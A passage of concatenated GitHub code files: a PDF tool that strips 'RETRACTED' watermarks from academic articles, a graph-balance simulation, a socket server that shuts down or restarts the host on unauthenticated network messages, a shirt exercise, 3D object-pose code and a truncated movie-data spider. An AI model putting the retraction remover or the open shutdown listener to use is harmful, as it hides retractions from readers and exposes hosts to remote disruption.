range(source.getNumPages()):\n page = source.getPage(page)\n if not page.get('/Resources'):\n continue\n if not page['/Resources'].get('/ExtGState'):\n continue\n extGstates += list(page['/Resources']['/ExtGState'].keys())\n\n # Count the occurrence of each Gs along the source pdf\n watermarks = []\n for key, occ in Counter(extGstates).items():\n if occ > 1:\n watermarks.append(key)\n\n return watermarks\n\ndef get_operands_watermarks_list(\n source: PdfFileReader,\n aggressive: int):\n \"\"\"\n According to the user aggresive will, returns the stream operands names\n that might be considerated as watermarks.\n\n Args:\n source: PyPDF file reader\n aggressive: Integer in [1,3]\n \"\"\"\n\n # Check the GS operators\n # Our heuristic is that if the GS appears in more then\n # one page, then it should be considerated as a watermark\n watermarks = get_GS_watermark_from_pdf(source) if aggressive> 1 else []\n for page in range(source.getNumPages()):\n page = source.getPage(page)\n watermarks += get_page_resources_watermarks(page, source)\n\n watermarks = list(set(watermarks))\n return watermarks\n\ndef check_blockqQ_has_watermark(\n block: ContentStream ,\n watermarks: List)-> bool:\n \"\"\"\n Check if the rendering watermark instruction\n is present in the Stream block.\n We are assuming that the blocks are within 'q' 'Q' structure instruction stack\n \"\"\"\n\n for (operands, _) in block:\n\n # operands is a list of operand\n for op in operands:\n if not isinstance(op, str):\n continue\n if op in watermarks:\n return True\n\n return False\n\ndef find_watermark_stack_block(\n page: PageObject,\n source: PdfFileReader,\n watermarks: List,\n aggressive: int) -> Tuple[List, ContentStream]:\n \"\"\"\n Find the all blocks of instructions stacks within the 'q' 'Q'\n that the Watermark instruction is involved\n\n Args:\n page: PyPDF page object\n source: PyPDF file reader\n watermarks: List of watermark 
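# Editor's note -- a stripped-down sketch of the /XObject walk above, using only
# PyPDF4 calls that already appear in this file; "input.pdf" is a placeholder, and
# indirect /PieceInfo entries would still need resolving, as
# fix_recursive_IndirectObject does above.
from PyPDF4 import PdfFileReader

with open("input.pdf", "rb") as f:
    page = PdfFileReader(f).getPage(0)
    resources = page.get("/Resources")
    xobjects = resources["/XObject"].getObject() if resources and "/XObject" in resources else {}
    for key in xobjects:
        info = str(xobjects[key].get("/PieceInfo", "")).lower()
        if "watermark" in info or "background" in info:
            print("candidate watermark resource:", key)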
operand names inside the PDF\n aggressive: Integer in [1,3]\n \"\"\"\n\n # Check if page has contents\n if page.get(\"/Contents\") is None:\n return [], None\n\n # q Q stack blocks with watermarks\n wm_blocksqQ = []\n\n Found = False\n index_op = 0\n # Get content objects id\n content_object = page[\"/Contents\"].getObject()\n # Retrive contents stream\n content = ContentStream(content_object, source)\n\n # For each operand check if it a q, if yes start a new\n # block, inserting the indeces and the operations involved\n # in lists.\n # If for any reason an operand of a Image (Im) or a text (BT)\n # is found, we will ignore that block, even if it contains a watermark;\n # otherwise we would erase valid information from the PDF.\n\n # If the Aggressive is more than 2, we don't check if the stack of intructions operands\n # have a watermark's operand or not, we include everthing that either isn't a text\n # nor a image as a watermark block of instruction.\n for operands, operator in content.operations:\n\n if Found:\n new_block_indeces.append(index_op)\n new_block_ops.append((operands, operator))\n\n if operator == b_('q'):\n Found = True\n new_block_indeces = [index_op]\n new_block_ops = [(operands, operator)]\n\n if type(operands) is list:\n if len(operands)>0:\n if isinstance(operands[0], NameObject):\n name = str(operands[0]).lower()\n if '/im' in name:\n Found = False\n new_block_indeces = []\n new_block_ops = []\n\n if operands == b_('BT'):\n Found = False\n new_block_indeces = []\n new_block_ops = []\n\n if operator == b_('Q') and Found:\n Found = False\n # If aggressive is more than 3, include even blocks that\n # don't have explicit a watermark operand to be erased\n if aggressive <=2:\n if check_blockqQ_has_watermark(new_block_ops, watermarks):\n wm_blocksqQ += new_block_indeces\n else:\n wm_blocksqQ += new_block_indeces\n\n index_op += 1\n\n return wm_blocksqQ, content\n\n\ndef remove_watermark_from_page(\n page: PageObject,\n source: PdfFileReader,\n watermarks: List,\n aggressive: int) -> Tuple[PageObject, ContentStream]:\n \"\"\"\n Considering the list 'watermark' of operand names consideraded as\n Watermark Resources, find all stack of rendering instruction that it participates\n and remove them from the page\n\n Args:\n page: PyPDF page object\n source: PyPDF file reader\n watermarks: List of watermark operand names inside the PDF\n aggressive: Integer in [1,3]\n \"\"\"\n\n wm_operation_blocks, content = find_watermark_stack_block(page, source, watermarks, aggressive)\n\n non_wm_blocks = []\n if not content is None:\n for ops_index, ops in enumerate(content.operations):\n if ops_index in wm_operation_blocks:\n continue\n non_wm_blocks.append((ops))\n\n # Update Page content with non watermark blocks\n content.operations = non_wm_blocks\n page.__setitem__(NameObject('/Contents'), content)\n\n\n\n if page.get('/Resources') is None:\n return page, content\n\n # Remove watermarks from the page resources\n for wm in watermarks:\n\n if page['/Resources'].get('/XObject'):\n if wm in page['/Resources']['/XObject'].keys():\n page['/Resources']['/XObject'].pop(wm)\n\n if page['/Resources'].get('/ExtGState'):\n if wm in page['/Resources']['/ExtGState'].keys():\n page['/Resources']['/ExtGState'].pop(wm)\n\n return page, content\n\ndef remove_graphical_watermarks_from_contents(\n page: PageObject,\n source: PdfFileReader) -> PageObject:\n \"\"\"\n This is a more aggressive watermark removal function.\n It removes all graphical operator instruction from a page stream\n Args:\n page: PyPDF 
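# Editor's note -- the q/Q scan in find_watermark_stack_block is a small state machine
# over (operands, operator) pairs: open a block on 'q', abort it when text begins,
# commit its indices on 'Q' if a watermark operand appeared. Toy stream below, no PDF
# library needed. (The original guards text with `operands == b_('BT')`; 'BT' appears
# to arrive in the operator field, so that guard likely never fires -- the sketch
# checks the operator instead.)
def wm_blocks(ops, watermarks):
    blocks, cur, inside = [], [], False
    for idx, (operands, operator) in enumerate(ops):
        if operator == 'q':                      # open a candidate block
            inside, cur = True, [idx]
            continue
        if not inside:
            continue
        cur.append(idx)
        if operator == 'BT':                     # text content -> never a watermark block
            inside, cur = False, []
        elif operator == 'Q':                    # close: keep if a WM operand appeared
            inside = False
            if any(op in watermarks for i in cur for op in ops[i][0]):
                blocks += cur
            cur = []
    return blocks

stream = [([], 'q'), (['/Fm0'], 'Do'), ([], 'Q'),        # watermark form -> kept
          ([], 'q'), ([], 'BT'), ([], 'ET'), ([], 'Q')]  # text -> skipped
print(wm_blocks(stream, {'/Fm0'}))  # [0, 1, 2]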
page object\n source: PyPDF file reader\n Return:\n page\n \"\"\"\n\n graph_operators = ['f', 'F','B', 'B*', 'b', 'b*', 'n', 'W', 'W*','m',\n 'l', 'c', 'v', 'y', 'h', 're',]\n if page.get('/Contents') is None:\n return page\n\n # Get content objects id\n content_object = page[\"/Contents\"].getObject()\n # Retrive contents stream\n content = ContentStream(content_object, source)\n\n # List of non graphical operations, remainded\n non_graphical_operations = []\n\n # Analyze each operation, keep only the non graphical ones\n for operands, operator in content.operations:\n if not operator in [b_(i) for i in graph_operators]:\n non_graphical_operations.append((operands, operator))\n\n # update content operations\n content.operations = non_graphical_operations\n page.__setitem__(NameObject('/Contents'), content)\n\n return page\n\ndef remove_retracted_watermarks_letters(\n page: PageObject,\n content: ContentStream) -> PageObject:\n \"\"\"\n This is a watermark removal function.\n It replaces the word \"RETRACTED\" from the page text\n by \"\".\n Args:\n page: PyPDF page object\n source: PyPDF file reader\n Return:\n page\n \"\"\"\n\n if content is None:\n return page\n\n\n # Check if the 'retracted' term appears in the text\n operations = []\n for operands, operator in content.operations:\n\n # TJ or Tj flags the occurence of a text term\n if operator == b_(\"TJ\") or operator == b_('Tj'):\n text = operands\n\n if not text:\n operations.append((operands, operator))\n continue\n\n if isinstance(text[0], list):\n text = \" \".join([str(i) for i in text])\n\n elif isinstance(text[0], str):\n text = text[0]\n\n else:\n operations.append((operands, operator))\n continue\n\n if (\"retracted\" in text.lower()) and len(text)< 30:\n operands = TextStringObject('')\n\n operations.append((operands, operator))\n\n content.operations = operations\n\n # update content operations\n page.__setitem__(NameObject('/Contents'), content)\n\n return page\n\ndef fitz_solvent_watermarks(\n input_pdf: str,\n output_pdf: str):\n \"\"\"\n Use the PyMuPDF function to remove watermark\n\n In case PyPDF fails, we use the solution from PyMupdf\n REFERENCE: https://github.com/pymupdf/PyMuPDF/issues/468#issuecomment-601142235\n\n Args:\n input_pdf: str,\n output_pdf: str):\n\n \"\"\"\n doc = fitz.open(input_pdf)\n\n for page in doc:\n\n page.cleanContents() # cleanup page painting commands\n\n if len(page.getContents()) > 0:\n xref = page.getContents()[0] # get xref of the resulting source\n cont0 = doc.xrefStream(xref).decode().splitlines() # and read it as lines of strings\n cont1 = [] # will contain reduced cont lines\n found = False # indicates we are inside watermark instructions\n\n for line in cont0:\n\n if line.startswith(\"/Artifact\") and ((\"/Background\" in line) or (\"/Watermark\" in line)): # start of watermark\n found = True # switch on\n continue # and skip line\n if found and line == \"EMC\": # end of watermark\n found = False # switch off\n continue # and skip line\n if found is False: # copy commands while outside watermarks\n cont1.append(line)\n\n cont = \"\\n\".join(cont1) # new paint commands source\n doc.updateStream(xref, cont.encode()) # replace old one with 'bytes' version\n\n # Removing annotationg, just in case\n annot = page.firstAnnot\n while annot:\n annot = page.deleteAnnot(annot)\n\n doc.save(output_pdf) # original uses garbage=4\n\ndef remove_watermarks(\n inputFile: str,\n outputFile: str,\n aggressive: int = 2):\n \"\"\"\n Removes 'RETRACTED' watermarks from Academic PDF articles.\n\n This 
function has three levels of aggressivity; as higher the level more damage it can cause to the final result.\n Even though, even for the maximum level of aggressivity, the images/photos embedded in the PDF are preserved.\n\n Aggressivity Level 1:\n All PDF stream resources that explicitly contain the information saying that it is a Watermark are removed.\n\n Aggressivity Level 2:\n All Watermarks from 1 and element Graphics that appear more than once along the PDF pages are removed.\n In addition, all 'RETRACTED' words are also removed.\n For some PDFs, this aggressivity level could remove the entire text from a Page.\n\n Aggressivity Level 3:\n All WM from 1 and 2 and all graphical elements are removed from the PDF.\n The only change for the Retraction Watermark not to be removed with such a level of aggressivity is the Retraction Watermark embedded as an Image File.\n In this case, we will preserve the Watermark since this function is designed not to erase any image/photo from the PDF.\n \"\"\"\n\n try:\n with open(inputFile, \"rb\") as f:\n source = PdfFileReader(f, \"rb\")\n output = PdfFileWriter()\n\n watermarks = get_operands_watermarks_list(source, aggressive)\n watermarks = list(set(watermarks))\n\n #TODO\n # Process the followint FOR in parallel\n for page in range(source.getNumPages()):\n page = source.getPage(page)\n if aggressive >0:\n page, content = remove_watermark_from_page(page, source, watermarks, aggressive)\n if aggressive >1:\n page = remove_retracted_watermarks_letters(page, content)\n if aggressive > 2:\n page = remove_graphical_watermarks_from_contents(page, source)\n output.addPage(page)\n\n with open(outputFile, \"wb\") as outputStream:\n output.write(outputStream)\n\n except PyPdfError:\n print(\"PyPDFError trying Pymupdf\")\n fitz_solvent_watermarks(inputFile, outputFile)\n\n","repo_name":"phillipecardenuto/watermark-removal","sub_path":"PDFSolvent/PDFSolvent.py","file_name":"PDFSolvent.py","file_ext":"py","file_size_in_byte":16708,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"11931031607","text":"import networkx as nx\nimport numpy as np\nimport scipy as sp\nimport random as rd\nimport matplotlib\nmatplotlib.use('QT5Agg')\nimport matplotlib.pyplot as plt\n\ndef random_triade(G):\n nodes = G.nodes().copy()\n triade_nodes = np.random.choice(nodes, size=3, replace=False)\n triade = nx.subgraph(G, triade_nodes)\n return triade\n\ndef is_balanced(triade): \n return True if (-1)**(3 - triade.number_of_edges()) == 1 else False\n\ndef imbalanced_triade(G, limit=1000):\n for i in range(limit):\n triade = random_triade(G)\n if not is_balanced(triade): return triade\n return None\n\ndef num_imbalanced_triades(G):\n num = 0\n nodes = G.nodes()\n for n1 in nodes[:-2]:\n for n2 in nodes[n1+1:-1]:\n for n3 in nodes[n2+1:]:\n if not is_balanced(nx.subgraph(G, [n1, n2, n3])): num += 1\n return num\n\ndef balance_triade_in_graph(G, triade, p):\n edges = triade.edges().copy()\n nodes = triade.nodes().copy()\n if len(edges) == 0: \n G.add_edge(*np.random.choice(nodes, size=2, replace=False))\n else:\n if np.random.random() < p:\n comp = nx.complement(triade)\n G.add_edge(*comp.edges()[0])\n else:\n G.remove_edge(*rd.choice(edges))\n\n\ndef original_graph():\n romeos_family = nx.complete_graph(5)\n julias_family = nx.complete_graph(5)\n # The families clash <- aw, not good!\n family_fight = nx.disjoint_union(romeos_family, julias_family)\n # ... 
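# Editor's note -- a typical call into the entry point above; the file names are
# placeholders. Level 1 drops only resources explicitly tagged as watermarks,
# level 2 also drops repeated graphics states and "RETRACTED" strings, and
# level 3 additionally strips vector graphics (embedded photos survive all levels).
remove_watermarks("retracted_article.pdf", "cleaned_article.pdf", aggressive=2)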
but Romeo and Julia make love nevertheless\n family_fight.add_edge(0, 9)\n return family_fight\n\n\ndef destiny(p=1./3.):\n family_fight = original_graph()\n \n i = 0\n while True:\n triade = imbalanced_triade(family_fight, limit = 1000)\n if triade == None:\n n = num_imbalanced_triades(family_fight)\n if n == 0: break\n else: balance_triade_in_graph(family_fight, triade, p)\n return family_fight\n\n\ndef family_positions():\n positions = []\n for i in range(0, 5):\n positions.append( (-1 + 0.75*np.cos((i-0)/5*2*np.pi), \n 0.75*np.sin((i-0)/5*2*np.pi)) )\n for i in range(5, 10):\n positions.append( ( 1 - 0.75*np.cos((i-9)/5*2*np.pi),\n 0.75*np.sin((i-9)/5*2*np.pi)) )\n return positions\n\n\ndef destinies(times=1000, p=1./3.):\n num_love = 0\n fracs = np.zeros(times)\n for j in range(times):\n family_fight = original_graph()\n \n i = 0\n while True:\n triade = imbalanced_triade(family_fight, limit = 1000)\n if triade == None:\n n = num_imbalanced_triades(family_fight)\n if n == 0: break\n else: balance_triade_in_graph(family_fight, triade, p)\n if family_fight.has_edge(0, 9): \n print(\"Destiny %d:\" % (j+1,), \"Love\")\n num_love += 1\n else: print(\"Destiny %d:\" % (j+1,), \"Hate\")\n fracs[j] = num_love/(j+1)\n print(\"Fraction: %f\" % (fracs[j],))\n return num_love/times, fracs, family_fight\n \n#P = np.linspace(0.1, 0.6, 20)\n#fracs = np.array( [ destinies(p=p)[0] for p in P ] )\n\n\n\n","repo_name":"tscode/Network-Science","sub_path":"D/python/D41.py","file_name":"D41.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"13849972702","text":"from socket import *\nimport os\nimport platform\n\nhost = \"192.168.43.117\"\nport = 9999\n\ns = socket(AF_INET,SOCK_STREAM)\ns.bind((host,port))\ns.listen(5)\n\nwhile True:\n c,addr = s.accept()\n type = c.recv(1024).decode('utf-8')\n if type==\"shutdown\":\n os.system(\"shutdown /f\")\n elif type==\"restart\":\n if platform.system()==\"Windows\":\n os.system(\"shutdown /r\")\n elif platform.system()==\"Linux\":\n os.system(\"shutdown -r\")\n elif type==\"music\":\n if platform.system()==\"Windows\":\n os.system(\"D:\\\\1.mp3\")\n elif platform.system()==\"Linux\":\n os.system(\"~/1.mp3\") \n \n","repo_name":"JayantGoel001/CYC","sub_path":"app/src/main/java/com/example/cyc/Server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"15780900565","text":"\"\"\"\n8-4. Large Shirts: Modify the make_shirt() function so that shirts are large\nby default with a message that reads I love Python. 
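# Editor's note -- a tiny check of the parity rule used by is_balanced above: with a
# present edge read as friendship and a missing edge as hostility, a triad is
# balanced exactly when it contains an odd number of friendly ties (1 or 3).
for edges in range(4):
    balanced = (-1) ** (3 - edges) == 1
    print(edges, "friendly tie(s):", "balanced" if balanced else "imbalanced")
# 0: imbalanced, 1: balanced, 2: imbalanced, 3: balanced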
Make a large shirt and a\nmedium shirt with the default message, and a shirt of any size with a different\nmessage.\n\"\"\"\n\n\ndef make_shirt(text, size='large'):\n print(f\"The size of the shirt is {size}.\")\n print(f\"The text should be printed is '{text.title()}'.\")\n\n\nmake_shirt(text='i love python')\nmake_shirt(text='i love linux', size='small')\n\n","repo_name":"t4chik0m4/Curso_Python","sub_path":"Chapter_8/Passing_Arguments/exercise/large_shirts.py","file_name":"large_shirts.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"13301847672","text":"import numpy as np\nimport numpy.linalg as LA\nimport cPickle as pk\nfrom glob import glob\nfrom os import makedirs, remove\nfrom os.path import join, exists, abspath, dirname, basename, isfile\n\nimport pinocchio as pin\nfrom pinocchio.utils import *\n\n\ndef load_object_2d_endpoints(\n path_object_2d_endpoints,\n frame_start,\n frame_end,\n path_scores=None):\n '''\n Load object 2D endpoints from the user-provided path.\n This function return a (6, nf) matrix, i.e. (x, y, confidence) * 2 endpoints = 6\n '''\n # npts: number of keypoints in the txt file. By default we consider 2 keypoints at each video frame: the first point as the head of the object and the second as the end of the bar.\n\n npts = 2\n with open(path_object_2d_endpoints, 'r') as f:\n data = np.loadtxt(f)\n if data.shape[0] > 0:\n fids = data[::npts,0].astype(int)\n endPts = np.zeros((fids.shape[0], 0)).astype(int)\n # In Jiri's raw output, the 1st endpoint is red, the 2nd is green\n for n in range(npts):\n endPts = np.concatenate((endPts, data[n::npts,1:]), axis=1)\n else:\n fids = []\n endPts = np.array([])\n\n\n # Load scores\n if path_scores is not None:\n with open(path_scores, 'r') as f:\n data = np.loadtxt(f)\n # fids_check = data_scores[:,0].astype(int)\n scores = data[:,1]\n nf = scores.shape[0]\n\n # parse the endPts and scores to a (6, nf) matrix\n endpoint_2d_positions = np.zeros((nf, 6))\n for i in range(len(fids)):\n fid = fids[i]\n endpoints = endPts[i]\n # get the correct order of the endpoints\n handle_end = 2\n head = 0\n # our Pinocchio object model assume index 0 as the end of handle and 1 as the object's head\n endpoint_2d_positions[fid,:2] = endpoints[handle_end:(handle_end+2)]\n endpoint_2d_positions[fid,3:5] = endpoints[head:(head+2)]\n\n if path_scores is not None:\n score = scores[fid]\n else:\n score = 1.\n\n endpoint_2d_positions[fid,2] = score\n endpoint_2d_positions[fid,5] = score\n\n endpoint_2d_positions = np.matrix(endpoint_2d_positions).T\n endpoint_2d_positions = endpoint_2d_positions[:, (frame_start-1):frame_end] # verbose\n\n return endpoint_2d_positions\n\ndef compute_object_config_initial_guesses(\n object_model,\n object_data,\n object_loader,\n person_loader,\n object_init_rotation_candidates=None):\n '''\n Generate a set of initial guesses for the object configurations\n '''\n person_joint_3d_positions = person_loader.joint_3d_positions_\n config_object_initial_guesses = []\n\n nf = person_joint_3d_positions.shape[1]\n object_init_positions = (person_joint_3d_positions[18*3:(18*3+3),:] + person_joint_3d_positions[23*3:(23*3+3),:])/2.# initialize object translation with hand positions\n\n if object_init_rotation_candidates is None:\n object_init_rotation_candidates = [[0., 1e-1, 0.],\n [0., np.pi/2., 0.],\n [0., np.pi, 0.],\n [0., -np.pi/2., 0.]]\n\n for rot in object_init_rotation_candidates:\n object_init_rotations_tiled = 
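# Editor's note -- the data[n::npts] slicing in load_object_2d_endpoints above
# de-interleaves a file that stores npts keypoint rows per frame; tiny demo with
# npts=2 and made-up coordinates.
import numpy as np

rows = np.array([[0, 10, 11],   # frame 0, point 0
                 [0, 20, 21],   # frame 0, point 1
                 [1, 12, 13],   # frame 1, point 0
                 [1, 22, 23]])  # frame 1, point 1
fids = rows[::2, 0].astype(int)                           # [0 1]
pts = np.concatenate([rows[n::2, 1:] for n in range(2)], axis=1)
print(fids, pts)  # each pts row is [p0x p0y p1x p1y] for one frame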
np.tile(np.matrix(rot).T, (1, nf))\n config_object_guess = np.concatenate(\n (object_init_positions, object_init_rotations_tiled), axis=0)\n\n # Refine config_object_guess for barbell sequences, such that the center\n # of the stick handle (where the contact points are initialized), lies\n # in the center of the person's hand positions for each frame\n if object_loader.name_ == \"barbell\":\n object_loader.LoadConfig(config_object_guess, object_loader.fps_)\n nq_pino = object_loader.nq_pino_\n nq_contact = object_loader.nq_contact_\n nq_keypoints = object_loader.nq_keypoints_\n nq_stacked = nq_pino + nq_keypoints + nq_contact\n config_stacked = np.matrix(np.zeros((nq_stacked, nf)))\n config_stacked[:nq_pino,:] = object_loader.config_pino_.copy()\n config_stacked[nq_pino:(nq_pino+nq_contact),:] = object_loader.config_contact_.copy()\n\n num_contacts = object_loader.num_contacts_\n for i in range(nf):\n # Compute the centroid position of the object contact points\n pin.forwardKinematics(object_model, object_data, config_stacked[:,i])\n centroid_object_contacts = zero(3)\n for k in range(num_contacts):\n centroid_object_contacts += object_data.oMi[object_loader.njoints_+1+k].translation\n centroid_object_contacts /= num_contacts\n # Offset the object translation by the difference between the centroid\n # and the center of the person's hands\n offset = config_object_guess[:3,i] - centroid_object_contacts\n config_object_guess[:3,i] += offset\n\n config_object_initial_guesses.append(config_object_guess)\n\n return config_object_initial_guesses\n\n\ndef LoadObject2dEndpoints(video_name, npts=2):\n '''\n load object 2D endpoints and confidence values\n return a (6, nf) matrix, i.e. (x, y, confidence) * 2 endpoints = 6\n --\n npts: number of keypoints in the txt file. 
By default we consider 2 keypoints at each video frame: the first point as the head of the object and the second as the end of the bar.\n '''\n if 'hammer' in video_name:\n endpts_path = join('object_detect', 'endpoints_corrected', video_name+'_endpoints_corrected.txt')\n else:\n endpts_path = join('object_detect', 'endpoints', video_name+'_endpoints.txt')\n scores_path = join('object_detect', 'scores', video_name+'_scores.txt')\n # load endpoints\n with open(endpts_path, 'r') as f:\n data_endpts = np.loadtxt(f)\n #print data_endpts.shape\n if data_endpts.shape[0] > 0:\n fids = data_endpts[::npts,0].astype(int)\n endPts = np.zeros((fids.shape[0], 0)).astype(int)\n for n in range(npts):\n endPts = np.concatenate((endPts, data_endpts[n::npts,1:]), axis=1)\n else:\n fids = []\n endPts = np.array([])\n # load confidence values\n with open(scores_path, 'r') as f:\n data_scores = np.loadtxt(f)\n # fids_check = data_scores[:,0].astype(int)\n scores = data_scores[:,1]\n nf = scores.shape[0]\n\n # correct the order of object endpoints.\n # NOTE: In Jiri's raw output, the 1st endpoint is red, the 2nd is green\n # barbell: 0 - right point, 1 - left point\n # scythe: 0 - handle end, 1 - head\n # spade: 0 - head, 1 - handle end\n # hammer: it dependes on the video\n endpoint_orders = {\n \"barbell_0002\": (0, 2),\n \"barbell_0003\": (0, 2),\n \"barbell_0007\": (0, 2),\n \"barbell_0008\": (0, 2),\n \"barbell_0010\": (0, 2),\n \"hammer_0001\": (0, 2),\n \"hammer_0003\": (0, 2),\n \"hammer_0006\": (2, 0),\n \"hammer_0007\": (2, 0),\n \"hammer_0010\": (0, 2),\n \"scythe_0001\": (0, 2),\n \"scythe_0002\": (0, 2),\n \"scythe_0003\": (0, 2),\n \"scythe_0005\": (0, 2),\n \"scythe_0006\": (0, 2),\n \"spade_0001\": (2,0),\n \"spade_0002\": (2,0),\n \"spade_0003\": (2,0),\n \"spade_0007\": (2,0),\n \"spade_0008\": (2,0)\n }\n\n # parse the endPts and scores to a (6, nf) matrix\n endpoint_2d_positions = np.zeros((nf, 6))\n for i in range(len(fids)):\n fid = fids[i]\n endpoints = endPts[i]\n # get the correct order of the endpoints\n handle_end = endpoint_orders[video_name][0]\n head = endpoint_orders[video_name][1]\n # our Pinocchio object model assume index 0 as the end of handle and 1 as the object's head\n endpoint_2d_positions[fid,:2] = endpoints[handle_end:(handle_end+2)]\n endpoint_2d_positions[fid,2] = scores[fid]\n endpoint_2d_positions[fid,3:5] = endpoints[head:(head+2)]\n endpoint_2d_positions[fid,5] = scores[fid]\n\n return np.matrix(endpoint_2d_positions).T\n\n\ndef estimate_object_handle_length(\n tool_name,\n joint_2d_positions,\n openpose_keypoints_neutral_pose,\n endpoint_2d_positions,\n ratio=.8):\n '''\n Estimate the object handle's 3D length accoring to its relative 2D length w.r.t. the person's torso size estimated by Openpose.\n The main steps include:\n 1. Compute the person's average torso length (in 2D).\n 2. Compute the average 2D length of the object.\n 3. Compute the relative length of the object handle w.r.t. the person's torso in 2D.\n 4. The 3D object length is obtained from the relative length and the person's 3D torso length (output by HMR).\n If there's no object 2D endpoint is detected, we use fixed scales for different types of objects\n '''\n\n # Estimate torso 2D length\n # Compute 2D lengths of (detected) torso links frame by frame,\n # and stack the results to the list torso_links_2d_len. 
The estimated\n # torso 2D length is finally obtained by averaging torso_links_2d_len.\n torso_link_ids = [[5,8], # l_shoulder, r_hip\n [2,11]] # r_shoulder, l_hip\n\n joint_2d_positions = joint_2d_positions.T.getA().reshape((-1,18,3))\n nf = joint_2d_positions.shape[0]\n\n torso_links_2d_lengths = []\n for i in range(nf):\n # Iterate over torso links\n for l,joint_ids in enumerate(torso_link_ids):\n # For link #l, make sure the joints are detected\n link_exists = True\n for j in joint_ids:\n confidence = joint_2d_positions[i,j,-1]\n if confidence <= .05:\n link_exists = False\n break\n\n if link_exists:\n joint_1 = joint_2d_positions[i,joint_ids[0],:2]\n joint_2 = joint_2d_positions[i,joint_ids[1],:2]\n torso_links_2d_lengths.append(LA.norm(joint_1-joint_2))\n\n # Sort per-frame torso lengths in descending order\n torso_links_2d_lengths = sorted(torso_links_2d_lengths, reverse=True)\n # Compute average 2D torso length using a propotion (determined by ratio)\n # of the per-frame results.\n nf_detected = len(torso_links_2d_lengths)\n nf_effective = int(ratio*nf_detected)\n nf_start = (nf_detected-nf_effective)/2\n nf_end = min(nf_start+nf_effective, nf_detected)\n torso_2d_len = np.mean(torso_links_2d_lengths[nf_start:nf_end])\n\n # Compute torso 3D length\n torso_links_3d_len = [None] * 2\n for l,joint_ids in enumerate(torso_link_ids):\n joint_1 = openpose_keypoints_neutral_pose[joint_ids[0],:3]\n joint_2 = openpose_keypoints_neutral_pose[joint_ids[1],:3]\n torso_links_3d_len[l] = LA.norm(joint_1-joint_2)\n\n torso_3d_len = np.mean(np.array(torso_links_3d_len))\n\n # Estimate object handle 2D length using\n endpoint_2d_positions = endpoint_2d_positions.T.getA().reshape((-1,2,3))\n if not endpoint_2d_positions.shape[0]==nf:\n print(\"Check failed: endpoint_2d_positions.shape[0]==nf ({0:d} vs {1:d})\".format(endpoint_2d_positions.shape[0], nf))\n\n handle_2d_lengths = []\n for i in range(nf):\n # Compute handle lengths for frames with detected endpoints\n object_detected = True\n for k in range(2):\n confidence = endpoint_2d_positions[i,k,-1]\n if confidence <= .05:\n object_detected = False\n break\n\n if object_detected:\n handle_end_pos = endpoint_2d_positions[i,0,:2]\n tool_head_pos = endpoint_2d_positions[i,1,:2]\n handle_2d_lengths.append(LA.norm(handle_end_pos-tool_head_pos))\n\n nf_detected = len(handle_2d_lengths)\n if nf_detected > 0:\n # Sort per-frame handle lengths in descending order\n handle_2d_lengths = sorted(handle_2d_lengths, reverse=True)\n # Compute average 2D handle length using a propotion (determined by ratio)\n # of the per-frame results.\n nf_effective = int(ratio*nf_detected)\n nf_start = (nf_detected-nf_effective)/2\n nf_end = min(nf_start+nf_effective, nf_detected)\n handle_2d_len = np.mean(handle_2d_lengths[nf_start:nf_end])\n scale = handle_2d_len/torso_2d_len\n else:\n # Maunally set scale if no object is detected at any time\n if tool_name == \"hammer\":\n scale = 1.\n elif tool_name == \"scythe\":\n scale = 1.\n elif tool_name == \"spade\":\n scale = 1.\n elif tool_name == \"barbell\":\n scale = 3.7 # 4.6, 4.65, 2.63, 2.93\n else:\n raise ValueError(\"Unknown tool name: {0:s}!\".format(tool_name))\n print(\"(object_pose.py) No object is detected, use default scale for estimating object 3D length ...\")\n handle_2d_len = 0.\n\n # Compute 3D handle length using similar triangles\n handle_3d_len = torso_3d_len*scale\n\n # Print info\n print(\"(object_pose.py) Estimated {0:s} length:\".format(tool_name))\n print(\" torso_2d_len: {0:.2f} 
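# Editor's note -- the length transfer above is plain similar-triangle arithmetic:
# the handle/torso ratio measured in pixels is applied to the 3D torso length from
# the neutral-pose skeleton. The numbers below are made up for illustration.
torso_2d_len = 180.0   # pixels, averaged over frames
handle_2d_len = 666.0  # pixels, averaged over detected frames
torso_3d_len = 0.52    # metres, from the neutral-pose keypoints
scale = handle_2d_len / torso_2d_len   # 3.70, dimensionless
handle_3d_len = torso_3d_len * scale   # ~1.92 m
print("scale=%.2f, handle_3d_len=%.2f m" % (scale, handle_3d_len))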
(pixels)\".format(torso_2d_len))\n print(\" handle_2d_len: {0:.2f} (pixels)\".format(handle_2d_len))\n print(\" torso_3d_len: {0:.2f} (m)\".format(torso_3d_len))\n print(\" Output handle_3d_len: {0:.2f} (m) (with scale {1:.2f})\".format(handle_3d_len, scale))\n\n return handle_3d_len\n","repo_name":"zongmianli/Estimating-3D-Motion-Forces","sub_path":"lib/object_pose.py","file_name":"object_pose.py","file_ext":"py","file_size_in_byte":13437,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"78"} +{"seq_id":"29159674678","text":"# -*- coding: utf-8 -*-\nimport datetime\nimport json\nimport logging\nimport time\nimport requests\nimport scrapy\nfrom scrapy import Request\n\nfrom ..items import MaoyanRequestItem\n\n\nclass MaoyanmoviehotSpider(scrapy.Spider):\n name = 'maoyanMovieHot'\n allowed_domains = ['maoyan.com']\n # start_urls = ['http://maoyan.com/']\n\n def __init__(self, *args, **kwargs):\n super(MaoyanmoviehotSpider, self).__init__(*args, **kwargs)\n self.movie_url = 'http://api.maoyan.com/mmdb/movie/v5/{}.json'\n # 城市默认设为广州\n self.hot_movie = 'http://api.maoyan.com/mmdb/movie/v4/list/hot.json?ci=20'\n\n def get_hotMovie(self):\n hot_movie = 'http://api.maoyan.com/mmdb/movie/v4/list/hot.json?ci=20'\n res = requests.get(hot_movie)\n data = json.loads(res.text)\n # 获取所有热门电影id\n movieIds = data.get('data').get('movieIds')\n return movieIds\n\n def start_requests(self):\n movieIds = self.get_hotMovie()\n for movie in movieIds:\n yield Request(self.movie_url.format(str(movie)), callback=self.parse_movie)\n\n # 电影基本信息解析,并构建影评请求\n\n def parse_movie(self, 